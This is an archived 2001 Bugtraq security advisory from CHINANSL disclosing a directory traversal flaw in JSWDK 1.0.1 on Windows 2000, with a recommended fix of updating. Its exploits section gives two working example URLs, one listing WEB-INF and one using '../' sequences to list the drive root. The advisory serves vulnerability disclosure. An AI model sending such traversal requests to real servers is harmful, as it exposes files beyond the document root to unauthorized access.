Bugtraq mailing list archives
CHINANSL Security Advisory(CSA-200106)
From: lovehacker <lovehacker () 263 NET>
Date: Wed, 28 Mar 2001 06:48:07 -0000
Topic: JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 Directory traversal Vulnerability vulnerable: Microsoft Win2000 ¡¡¡¡+JSWDK1.0.1 maybe for other operating system also. discussion: A security vulnerability has been found in Windows NT/2000 systems that have JSWDK 1.0.1 installed.The vulnerability allows remote attackers to access files outside the document root directory scope. exploits: http://localhost:8080/examples//WEB-INF/ listing /WEB-INF/ Directory . http://localhost:8080/../examples//WEB-INF/../../../../../ if JSWDK installd in c:\ the question will listing c:\ all file and directory. solution: Update JSWDK Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use. CHINANSL Security Team <lovehacker () chinansl com> CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)
Current thread:
- CHINANSL Security Advisory(CSA-200106) lovehacker (Mar 28)